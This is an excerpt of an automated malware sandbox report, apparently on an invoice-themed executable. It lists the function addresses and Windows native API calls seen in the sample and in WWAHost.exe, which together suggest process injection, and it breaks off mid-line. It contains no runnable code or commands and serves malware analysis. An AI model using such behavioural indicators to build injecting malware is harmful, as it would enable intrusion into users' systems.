          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00417740 NtReadFile,2_2_00417740
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_004177C0 NtClose,2_2_004177C0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041773A NtReadFile,2_2_0041773A
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA2D0 NtClose,LdrInitializeThunk,2_2_00ACA2D0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA240 NtReadFile,LdrInitializeThunk,2_2_00ACA240
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA3E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00ACA3E0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA360 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00ACA360
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA4A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00ACA4A0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA480 NtMapViewOfSection,LdrInitializeThunk,2_2_00ACA480
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACACE0 NtCreateMutant,LdrInitializeThunk,2_2_00ACACE0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA410 NtQueryInformationToken,LdrInitializeThunk,2_2_00ACA410
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA5F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00ACA5F0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA560 NtQuerySystemInformation,LdrInitializeThunk,2_2_00ACA560
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA540 NtDelayExecution,LdrInitializeThunk,2_2_00ACA540
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA6A0 NtCreateSection,LdrInitializeThunk,2_2_00ACA6A0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA610 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00ACA610
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA720 NtResumeThread,LdrInitializeThunk,2_2_00ACA720
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA700 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00ACA700
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA750 NtCreateFile,LdrInitializeThunk,2_2_00ACA750
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACB0B0 NtGetContextThread,2_2_00ACB0B0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA800 NtSetValueKey,2_2_00ACA800
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA2F0 NtQueryInformationFile,2_2_00ACA2F0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA220 NtWaitForSingleObject,2_2_00ACA220
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACBA30 NtSetContextThread,2_2_00ACBA30
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA260 NtWriteFile,2_2_00ACA260
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA3D0 NtCreateKey,2_2_00ACA3D0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA310 NtEnumerateValueKey,2_2_00ACA310
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA370 NtQueryInformationProcess,2_2_00ACA370
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA350 NtQueryValueKey,2_2_00ACA350
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA430 NtQueryVirtualMemory,2_2_00ACA430
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACB410 NtOpenProcessToken,2_2_00ACB410
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA460 NtOpenProcess,2_2_00ACA460
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA470 NtSetInformationFile,2_2_00ACA470
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACB470 NtOpenThread,2_2_00ACB470
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA5A0 NtWriteVirtualMemory,2_2_00ACA5A0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA520 NtEnumerateKey,2_2_00ACA520
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACBD40 NtSuspendThread,2_2_00ACBD40
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA6D0 NtCreateProcessEx,2_2_00ACA6D0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA650 NtQueueApcThread,2_2_00ACA650
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA780 NtOpenDirectoryObject,2_2_00ACA780
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA710 NtQuerySection,2_2_00ACA710
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00417870 NtAllocateVirtualMemory,2_1_00417870
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00417690 NtCreateFile,2_1_00417690
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00417740 NtReadFile,2_1_00417740
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_004177C0 NtClose,2_1_004177C0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041773A NtReadFile,2_1_0041773A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA3D0 NtCreateKey,LdrInitializeThunk,8_2_038EA3D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA3E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_038EA3E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA310 NtEnumerateValueKey,LdrInitializeThunk,8_2_038EA310
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA350 NtQueryValueKey,LdrInitializeThunk,8_2_038EA350
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA360 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_038EA360
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA2D0 NtClose,LdrInitializeThunk,8_2_038EA2D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA240 NtReadFile,LdrInitializeThunk,8_2_038EA240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA800 NtSetValueKey,LdrInitializeThunk,8_2_038EA800
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA750 NtCreateFile,LdrInitializeThunk,8_2_038EA750
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA6A0 NtCreateSection,LdrInitializeThunk,8_2_038EA6A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA610 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_038EA610
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA540 NtDelayExecution,LdrInitializeThunk,8_2_038EA540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA560 NtQuerySystemInformation,LdrInitializeThunk,8_2_038EA560
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA480 NtMapViewOfSection,LdrInitializeThunk,8_2_038EA480
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EACE0 NtCreateMutant,LdrInitializeThunk,8_2_038EACE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA410 NtQueryInformationToken,LdrInitializeThunk,8_2_038EA410
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA370 NtQueryInformationProcess,8_2_038EA370
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA2F0 NtQueryInformationFile,8_2_038EA2F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA220 NtWaitForSingleObject,8_2_038EA220
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EBA30 NtSetContextThread,8_2_038EBA30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA260 NtWriteFile,8_2_038EA260
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EB0B0 NtGetContextThread,8_2_038EB0B0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA780 NtOpenDirectoryObject,8_2_038EA780
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA700 NtProtectVirtualMemory,8_2_038EA700
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA710 NtQuerySection,8_2_038EA710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA720 NtResumeThread,8_2_038EA720
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA6D0 NtCreateProcessEx,8_2_038EA6D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA650 NtQueueApcThread,8_2_038EA650
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA5A0 NtWriteVirtualMemory,8_2_038EA5A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA5F0 NtReadVirtualMemory,8_2_038EA5F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA520 NtEnumerateKey,8_2_038EA520
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EBD40 NtSuspendThread,8_2_038EBD40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA4A0 NtUnmapViewOfSection,8_2_038EA4A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EB410 NtOpenProcessToken,8_2_038EB410
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA430 NtQueryVirtualMemory,8_2_038EA430
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA460 NtOpenProcess,8_2_038EA460
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA470 NtSetInformationFile,8_2_038EA470
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EB470 NtOpenThread,8_2_038EB470
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02DA7870 NtAllocateVirtualMemory,8_2_02DA7870
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02DA7690 NtCreateFile,8_2_02DA7690
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02DA77C0 NtClose,8_2_02DA77C0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02DA7740 NtReadFile,8_2_02DA7740
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02DA773A NtReadFile,8_2_02DA773A
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_0045C490 0_2_0045C490
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_004572C4 0_2_004572C4
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00401030 2_2_00401030
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041B172 2_2_0041B172
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041A9EA 2_2_0041A9EA
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041B2F8 2_2_0041B2F8
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041AAAF 2_2_0041AAAF
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00408B40 2_2_00408B40
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00408B3B 2_2_00408B3B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041AC70 2_2_0041AC70
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00402D90 2_2_00402D90
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041B5BB 2_2_0041B5BB
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041A666 2_2_0041A666
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041B6CE 2_2_0041B6CE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041AEDE 2_2_0041AEDE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00402FB0 2_2_00402FB0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B318B6 2_2_00B318B6
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00A9A080 2_2_00A9A080
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B528E8 2_2_00B528E8
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB48CB 2_2_00AB48CB
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB0021 2_2_00AB0021
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ABE020 2_2_00ABE020
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B4D016 2_2_00B4D016
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB9810 2_2_00AB9810
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB1070 2_2_00AB1070
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B5D9BE 2_2_00B5D9BE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB6180 2_2_00AB6180
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B519E2 2_2_00B519E2
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B461DF 2_2_00B461DF
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AD9906 2_2_00AD9906
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB7110 2_2_00AB7110
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB594B 2_2_00AB594B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AA42B0 2_2_00AA42B0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B51A99 2_2_00B51A99
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B522DD 2_2_00B522DD
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB523D 2_2_00AB523D
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B5E214 2_2_00B5E214
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B40A02 2_2_00B40A02
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB4A5B2_2_00AB4A5B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB4B962_2_00AB4B96
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00A8EBE02_2_00A8EBE0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB63C22_2_00AB63C2
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AAFB402_2_00AAFB40
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B434902_2_00B43490
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B51C9F2_2_00B51C9F
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B52C9A2_2_00B52C9A
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B444EF2_2_00B444EF
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B4DCC52_2_00B4DCC5
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B3F42B2_2_00B3F42B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00A9740C2_2_00A9740C
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AA14102_2_00AA1410
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB547E2_2_00AB547E
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B4E5812_2_00B4E581
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B2E58A2_2_00B2E58A
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B31DE32_2_00B31DE3
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B4D5D22_2_00B4D5D2
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B3FDDB2_2_00B3FDDB
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B2C53F2_2_00B2C53F
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AA15302_2_00AA1530
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B525192_2_00B52519
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B41D1B2_2_00B41D1B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00A80D402_2_00A80D40
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B43E962_2_00B43E96
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B526F82_2_00B526F8
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB66112_2_00AB6611
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB4E612_2_00AB4E61
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B4CE662_2_00B4CE66
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB5E702_2_00AB5E70
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AA76402_2_00AA7640
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B427822_2_00B42782
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AA57902_2_00AA5790
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B51FCE2_2_00B51FCE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B517462_2_00B51746
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_004010302_1_00401030
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041B1722_1_0041B172
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041A9EA2_1_0041A9EA
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041B2F82_1_0041B2F8
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041AAAF2_1_0041AAAF
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00408B402_1_00408B40
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00408B3B2_1_00408B3B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041AC702_1_0041AC70
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00402D902_1_00402D90
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041B5BB2_1_0041B5BB
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041A6662_1_0041A666
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041B6CE2_1_0041B6CE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041AEDE2_1_0041AEDE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00402FB02_1_00402FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D4B968_2_038D4B96
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D63C28_2_038D63C2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038AEBE08_2_038AEBE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038CFB408_2_038CFB40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_03971A998_2_03971A99
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038C42B08_2_038C42B0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039722DD8_2_039722DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_0397E2148_2_0397E214
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_03960A028_2_03960A02
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D523D8_2_038D523D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D4A5B8_2_038D4A5B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D61808_2_038D6180
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_0397D9BE8_2_0397D9BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039661DF8_2_039661DF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039719E28_2_039719E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038F99068_2_038F9906
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D71108_2_038D7110
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D594B8_2_038D594B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038BA0808_2_038BA080
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039518B68_2_039518B6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D48CB8_2_038D48CB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039728E88_2_039728E8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_0396D0168_2_0396D016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D98108_2_038D9810
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D00218_2_038D0021
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038DE0208_2_038DE020
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D10708_2_038D1070
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039627828_2_03962782
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038C57908_2_038C5790
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_03971FCE8_2_03971FCE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039717468_2_03971746
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_03963E968_2_03963E96
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039726F88_2_039726F8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D66118_2_038D6611
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038C76408_2_038C7640
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D4E618_2_038D4E61
          Source: C:\Windows\SysWOW64\WWAHost.e